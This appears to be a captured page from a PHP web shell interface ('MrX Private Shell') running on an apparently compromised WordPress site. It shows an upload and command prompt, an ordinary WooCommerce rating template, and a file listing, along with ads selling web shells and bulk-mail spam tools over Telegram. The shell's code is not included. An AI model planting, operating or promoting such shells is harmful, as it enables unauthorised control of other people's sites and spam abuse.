__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<div class="eb-woo-product-rating-wrapper">

    <?php
        if ( ! isset( $ratingStyle ) ) {
            $ratingStyle = 'star';
        }

        if ( 'star' === $ratingStyle ) {
            for ( $i = 1; $i <= 5; $i++ ) {
                if ( $i <= $product->get_average_rating() ) {
                    echo wp_kses_post( '<span class="eb-woo-product-rating filled"><i class="fas fa-star"></i></span>' );
                } else {
                    echo wp_kses_post( '<span class="eb-woo-product-rating"><i class="far fa-star"></i></span>' );
                }
            }
        } else if ( 'number' === $ratingStyle ) {
            echo sprintf( '<span class="eb-woo-product-rating filled"><i class="fas fa-star"></i> %1$s</span>',
                esc_html( $product->get_average_rating() )
            );
        }
    ?>
</div>

Filemanager

Name Type Size Permission Actions
button-list.php File 338 B 0640
category.php File 921 B 0640
details.php File 127 B 0640
gallery.php File 1.28 KB 0640
image.php File 245 B 0640
price.php File 97 B 0640
rating.php File 842 B 0640
single-product.php File 4.82 KB 0640
single-rating.php File 1.74 KB 0640
title.php File 245 B 0640
Filemanager